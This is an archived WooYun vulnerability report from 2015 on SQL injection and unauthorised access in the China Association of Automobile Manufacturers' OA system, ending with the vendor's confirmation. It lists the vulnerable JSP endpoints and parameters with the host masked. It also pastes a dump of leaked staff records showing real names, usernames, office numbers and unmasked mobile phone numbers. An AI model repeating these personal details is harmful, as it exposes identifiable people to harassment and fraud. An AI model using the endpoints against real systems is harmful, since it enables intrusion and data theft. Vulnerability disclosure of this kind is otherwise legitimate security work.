漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0162536
漏洞标题:中国汽车工业协会多处漏洞打包泄露大量信息
相关厂商:中国汽车工业协会
漏洞作者: 路人甲
提交时间:2015-12-19 15:32
修复时间:2016-02-04 17:47
公开时间:2016-02-04 17:47
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-04: 细节向公众公开
简要描述:
rt
详细说明:
中国汽车工业协会OA系统
多处注入+越权
泄露大量信息
**.**.**.**:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1
**.**.**.**:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2
**.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=1
基(分管领导)','yeshengji',1,10001,10032,10002,0,'0','201','201','10051','','68595193','15810036327','yeshengji@**.**.**.**','','1',10017,0,'0','1910-01-01',''); personList[6]= new Person(10006,'师建华(分管领导)','shijianhua',1,10001,10032,10002,0,'0','202','202','10052','','68595093','13701378702','shijianhua@**.**.**.**','','1',10014,0,'0','1910-01-01',''); personList[7]= new Person(10006,'师建华(分管领导)','shijianhua',1,10001,10032,10002,0,'0','202','202','10052','','68595093','13701378702','shijianhua@**.**.**.**','','1',10013,0,'0','1910-01-01',''); personList[8]= new Person(10006,'师建华(分管领导)','shijianhua',1,10001,10032,10002,0,'0','202','202','10052','','68595093','13701378702','shijianhua@**.**.**.**','','1',10012,0,'0','1910-01-01',''); personList[9]= new Person(10005,'姚杰(分管领导)','yaojie',1,10001,10032,10002,0,'0','207','207','','','68594187','13701350925','yaojie@**.**.**.**','','1',10009,0,'0','1910-01-01',''); personList[10]= new Person(10005,'姚杰(分管领导)','yaojie',1,10001,10032,10002,0,'0','207','207','','','68594187','13701350925','yaojie@**.**.**.**','','1',10007,0,'0','1910-01-01',''); personList[11]= new Person(10001,'董扬(分管领导)','dongyang',1,10021,10034,10008,0,'0','101','101','','','68595192','13910721956','dongyang@**.**.**.**','','1',10006,0,'0','1910-01-01',''); personList[12]= new Person(10001,'董扬','dongyang',1,10021,10034,10008,0,'0','101','101','','','68595192','13910721956','dongyang@**.**.**.**','','1',0,0,'0','1910-01-01',''); personList[13]= new Person(10010,'叶盛基','yeshengji',1,10001,10032,10002,0,'0','201','201','10051','','68595193','15810036327','yeshengji@**.**.**.**','','1',10011,0,'0','1910-01-01',''); personList[14]= new Person(10010,'叶盛基','yeshengji',1,10001,10032,10002,0,'0','201','201','10051','','68595193','15810036327','yeshengji@**.**.**.**','','1',0,0,'0','1910-01-01',''); personList[15]= new Person(10006,'师建华','shijianhua',1,10001,10032,10002,0,'0','202','202','10052','','68595093','13701378702','shijianhua@**.**.**.**','','1',0,0,'0','1910-01-01',''); personList[16]= new Person(10088,'许艳华','xuyanhua',1,10001,10032,10002,0,'0','203','203','','','68595525','13504302799','xuyanhua@**.**.**.**','','0',0,0,'0','1970-01-01',''); personList[17]= new Person(10066,'刘小苗','liuxiaomiao',1,10001,10032,10002,0,'0','204','204','10043','','68595020','13911619111','liuxiaomiao@**.**.**.**','','0',0,0,'0','1970-01-01',''); personList[18]= new Person(10087,'李万里','liwanli',1,10001,10032,10002,0,'0','205','205','','','68595265','13701288007','liwanli@**.**.**.**','','1',0,0,'0','1970-01-01',''); personList[19]= new Person(10089,'李京生','lijingsheng',1,10018,10031,10006,0,'0','206','206','','','68595439','13701194612','lijingsheng@**.**.**.**','','1',0,0,'0','1970-01-01',''); personList[20]= new Person(10005,'姚杰','yaojie',1,10001,10032,10002,0,'0','207','207','','','68594187','13701350925','yaojie@**.**.**.**','','1',0,0,'0','1910-01-01',''); personList[21]= new Person(10108,'李彬','libin',1,10022,10038,10010,0,'0','301','301','','','68596388','13910588315','libin@**.**.**.**','','1',0,0,'0','1970-01-01',''); personList[22]= new Person(10131,'夏胜
漏洞证明:
如上
修复方案:
如上
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-12-23 11:48
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
最新状态:
暂无